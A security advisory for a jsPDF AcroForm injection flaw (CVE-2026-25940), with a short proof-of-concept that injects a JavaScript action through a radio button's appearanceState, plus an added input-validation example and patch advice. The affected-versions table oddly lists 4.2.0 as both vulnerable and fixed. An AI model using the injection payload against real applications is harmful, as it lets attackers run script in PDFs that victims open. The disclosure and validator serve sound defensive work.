CVSS score: 8.1

jsPDF PDF Injection Allows Arbitrary JavaScript Execution

CVE-2026-25940 GHSA-p5xg-68wr-hm3m
Summary

The jsPDF library has a security flaw that allows attackers to inject malicious JavaScript code into PDF files created with it. This can happen when user-supplied data reaches a PDF form field property without being validated. To fix this, update to jsPDF version 4.2.0 or later, or sanitize user input before passing it to the library.

What to do
  • Update mrjameshall jspdf to version 4.2.0.
  • Update jspdf to version 4.2.0.
Affected software
| Vendor | Product | Affected versions | Fix available |
| --- | --- | --- | --- |
| mrjameshall | jspdf | <= 4.2.0 | 4.2.0 |
| parall | jspdf | <= 4.2.0 | |
| | jspdf | <= 4.2.0 | 4.2.0 |
Original title
jsPDF has a PDF Injection in AcroForm module allows Arbitrary JavaScript Execution (RadioButton.createOption and "AS" property)
Original description
### Impact

User control of properties and methods of the Acroform module allows users to inject arbitrary PDF objects, such as JavaScript actions.

If given the possibility to pass unsanitized input to the following property, a user can inject arbitrary PDF objects, such as JavaScript actions, which are executed when the victim hovers over the radio option.

* `AcroformChildClass.appearanceState`

Example attack vector:

```js
import { jsPDF } from "jspdf"
const doc = new jsPDF();

const group = new doc.AcroFormRadioButton();
group.x = 10; group.y = 10; group.width = 20; group.height = 10;
doc.addField(group);

const child = group.createOption("opt1");
child.x = 10; child.y = 10; child.width = 20; child.height = 10;
child.appearanceState = "Off /AA << /E << /S /JavaScript /JS (app.alert('XSS')) >> >>";

doc.save("test.pdf");
```

### Patches

The vulnerability has been fixed in jspdf@4.2.0.

### Workarounds
Sanitize user input before passing it to the vulnerable API members.
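As an added example that is not part of this advisory or of the jsPDF project, the following validator implements that workaround for `appearanceState`: it accepts only a value that parses as a single PDF name token and that is either `Off` or one of the option names the application itself created. The option list, the `classify` helper and the sample inputs are assumptions constructed for the demonstration.

```javascript
// Added example (not jsPDF or advisory code): validate a user-supplied
// appearance state before assigning it to AcroformChildClass.appearanceState.
// The /AS entry is a PDF name object. If the value contains whitespace or a
// PDF delimiter, everything after it is parsed as further dictionary entries,
// which is how the advisory's "/AA << /E ... /JavaScript ... >>" payload ends
// up attached to the radio option.

// Whitespace and delimiters that end a name token or start another object;
// '#' is included because it introduces hex escapes inside a name.
const PDF_TOKEN_BREAKERS = /[\s()<>\[\]{}\/%#]/;

// True when `value` can only ever be read as one printable-ASCII name token.
function isSinglePdfNameToken(value) {
  return typeof value === "string" &&
    value.length > 0 &&
    !PDF_TOKEN_BREAKERS.test(value) &&
    /^[\x21-\x7e]+$/.test(value);
}

// Allow-list check: a radio option's appearance state should be "Off" or one
// of the option names the application itself created for the group.
// `optionNames` is an assumed array maintained by the calling application.
function resolveAppearanceState(value, optionNames) {
  if (!isSinglePdfNameToken(value)) {
    throw new Error("appearanceState is not a single PDF name token");
  }
  if (value !== "Off" && !optionNames.includes(value)) {
    throw new Error("appearanceState is not a known option of this group");
  }
  return value;
}

// Constructed inputs: the advisory's injected string and an assumed option list.
const OPTIONS = ["opt1", "opt2"];
const INJECTED = "Off /AA << /E << /S /JavaScript /JS (app.alert('XSS')) >> >>";

// Reports, for each candidate state, whether validation accepts or rejects it.
function classify(candidates, optionNames) {
  const result = {};
  for (const c of candidates) {
    try { resolveAppearanceState(c, optionNames); result[c] = "accepted"; }
    catch (e) { result[c] = "rejected"; }
  }
  return result;
}
```

In application code the assignment from the advisory's snippet becomes `child.appearanceState = resolveAppearanceState(userInput, OPTIONS)`, so an injected value throws before jsPDF ever serialises it.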
NVD CVSS 3.1 score: 8.1
Vulnerability type: CWE-116 (Improper Encoding or Escaping of Output)
Published: 19 Feb 2026 · Updated: 12 Mar 2026 · First seen: 6 Mar 2026